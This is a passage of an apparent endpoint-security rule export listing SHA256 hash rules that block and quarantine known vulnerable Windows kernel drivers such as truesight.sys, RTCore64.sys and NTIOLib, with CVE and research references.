"rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fc3e8554602c476e2edfa92ba4f6fb2e5ba0db433b9fbd7d8be1036e454d2584", + "comment": "Vulnerable Kernel Driver (aka phymem_ext64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5137b3fd-a9e2-5b4a-861d-525c41143668", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.158993Z", + "creation_date": 
"2026-03-23T11:45:31.158995Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159001Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "17ffa8ad0e834375aef70c23e474676b09fc8d3a6dc1a14673dc7865f8e3503d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "513fa4b3-d800-557c-aa84-f5a578980a74", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982485Z", + "creation_date": "2026-03-23T11:45:29.982487Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982493Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0fd2df82341bf5ebb8a53682e60d08978100c01acb0bed7b6ce2876ada80f670", + "comment": "Vulnerable Kernel Driver (aka Lurker.sys) [https://www.loldrivers.io/drivers/3fb743b8-d3ed-4873-9c95-e212720dde21/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "51457347-9d1a-5489-a768-d4a4b6ab8154", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146313Z", + "creation_date": "2026-03-23T11:45:31.146315Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146321Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "772a27f809add1bf474c38286c70ff3dd508c6c1d6feb9fe7e265004ff0cdb19", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "514755c6-3832-5226-bd2a-cedd12472bee", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147656Z", + "creation_date": "2026-03-23T11:45:31.147658Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.147663Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a8f74806851f6221c107dc27a0adb75c7d19fd83374afdf2fb6858ba657841b1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5149574e-0e49-5858-9d50-8823b9b3dc22", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.140151Z", + "creation_date": "2026-03-23T11:45:31.140154Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.140159Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "78a270ee9b994c11ed6295e9f3a24add38c711b1b3af96fed111e04bc2a6bbca", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "515217d0-bb8d-56ac-a08f-2a2b2edce24f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816014Z", + "creation_date": "2026-03-23T11:45:30.816017Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816026Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7de1ce434f957df7bbdf6578dd0bf06ed1269f3cc182802d5c499f5570a85b3a", + "comment": "Vulnerable Kernel Driver (aka ecsiodriverx64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "51669b63-d90b-5f2d-868b-87e18dfe8c9d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619246Z", + "creation_date": "2026-03-23T11:45:29.619248Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619254Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + 
"value": "32e1a8513eee746d17eb5402fb9d8ff9507fb6e1238e7ff06f7a5c50ff3df993", + "comment": "Realtek vulnerable driver (aka rtkio64.sys, rtkiow10x64.sys and rtkiow8x64.sys) [https://github.com/blogresponder/Realtek-rtkio64-Windows-driver-privilege-escalation] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "516cc22c-7723-5419-a611-c6fe402234c9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.489376Z", + "creation_date": "2026-03-23T11:45:31.489380Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.489388Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2821f21417c3d38468cb924d6caaf3a4f40a9d25d2477c299c7aa84c2ab5fea1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "51713de4-e1f2-58d7-85bf-662d7d72bfcc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985393Z", + "creation_date": "2026-03-23T11:45:29.985395Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985401Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9199979b9f3ea2108299d028373a6effcc41c81a46eecb430cc6653211d2913d", + "comment": "Dangerous Physmem Kernel Driver (aka Se64a.Sys) [https://www.loldrivers.io/drivers/d819bee2-3bff-481f-a301-acc3d1f5fe58/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5174fd59-99cf-5d49-96fc-3548959033b5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.454968Z", + "creation_date": "2026-03-23T11:45:30.454971Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.454980Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "23115b5b1d5511d59cdad75f863d65893304dc098848dcb149b69492f51b31f6", + "comment": "Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [file 
SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "51779d72-5f52-576d-9aac-2a5f5129845d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.471532Z", + "creation_date": "2026-03-23T11:45:31.471536Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.471545Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "84f03b74b9fe26ceed42a64153d127aeae41ff94b5fc86e0484a17e1b2a2a8b1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "51800cdd-5718-5b84-b5b1-393f6fafc75f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817356Z", + "creation_date": "2026-03-23T11:45:31.817358Z", + "enabled": true, + "block_on_agent": true, + 
"quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817363Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b0e89f000488af2af5872b63c17b0f5fd54b30abf9f93af4c9add231ccaecfab", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "518d211c-4eac-5f66-a818-d9c7484d4dc2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.494328Z", + "creation_date": "2026-03-23T11:45:31.494331Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.494339Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8dd18f32fbffb03a0eeb33782a5b239673597f85b195273894d33013643e3242", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "518e89ba-b3ce-5c8b-8c53-68f1bfd9e121", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607400Z", + "creation_date": "2026-03-23T11:45:29.607402Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607407Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f9bc6b2d5822c5b3a7b1023adceb25b47b41e664347860be4603ee81b644590e", + "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5193f4ad-67cb-5800-a8ef-45bea3467d63", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615815Z", + "creation_date": "2026-03-23T11:45:29.615817Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:29.615822Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "21a6689456d9833453d5247e4c5faf13edcd4835408e033c40ae1a225711ae8f", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "51a0901e-5abd-5304-96e9-1a6b1fbaeec4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974730Z", + "creation_date": "2026-03-23T11:45:29.974732Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974738Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2ffbb534c73106a2879d5a9d4ad3436c8d3ab8ac6aa8b217e26a6492fa1d16d0", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "51a615f9-acb9-5db7-b511-36a78b3cf2e0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141803Z", + "creation_date": "2026-03-23T11:45:31.141805Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141810Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c6b6b0e4850caa2f5f75de0667d758e420b33bda452c21d9cdf6ff29300f84f3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "51aef40b-a6af-5853-8386-18c0ea344fca", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820634Z", + "creation_date": "2026-03-23T11:45:30.820636Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820641Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "dee384604d2d0018473941acbefe553711ded7344a4932daeffb876fe2fa0233", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "51b245a9-91b3-56b9-9410-f60cd227cf4b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615362Z", + "creation_date": "2026-03-23T11:45:29.615364Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615369Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cf3ec8972720f84d73e907bb293de40468a0d605ce0da658a786f7b4842b3c62", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "51b8638c-1275-5875-9018-7c2e4125e056", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.829786Z", + "creation_date": "2026-03-23T11:45:31.829789Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.829797Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ffc46be50708610ec4f477ca2813d6888eb60dc9b3677ea173496b68948b33c1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "51bbddf6-fc33-51c0-8ecc-ed449ac50690", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492019Z", + "creation_date": "2026-03-23T11:45:31.492021Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492027Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "65206a8a5700b4b0f9d8e2fd8e2f761b7af5af9d2d6cbd754da8cc258acd2a76", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "51c70e1d-21db-5b56-98ad-6260a58202ac", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.471801Z", + "creation_date": "2026-03-23T11:45:30.471804Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.471814Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b4c07f7e7c87518e8950eb0651ae34832b1ecee56c89cdfbd1b4efa8cf97779f", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "51cf5dba-c570-5537-88b5-274f7c16af18", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.836735Z", + "creation_date": "2026-03-23T11:45:30.836737Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.836743Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "de183d93f715ca042b42104b1d9b4151af3a75c97d05c5b2dbc76f152be7c7cc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "51dea23f-b7d5-59dc-a3b3-89486eb082f4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.493311Z", + "creation_date": "2026-03-23T11:45:31.493313Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.493319Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "13f8fb9643a8d4a721ed8f1ae882d4ef8be6413d7b35feb142e42cf787a086be", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "51e9f54c-f453-565a-b5f0-125296cfc08c", + 
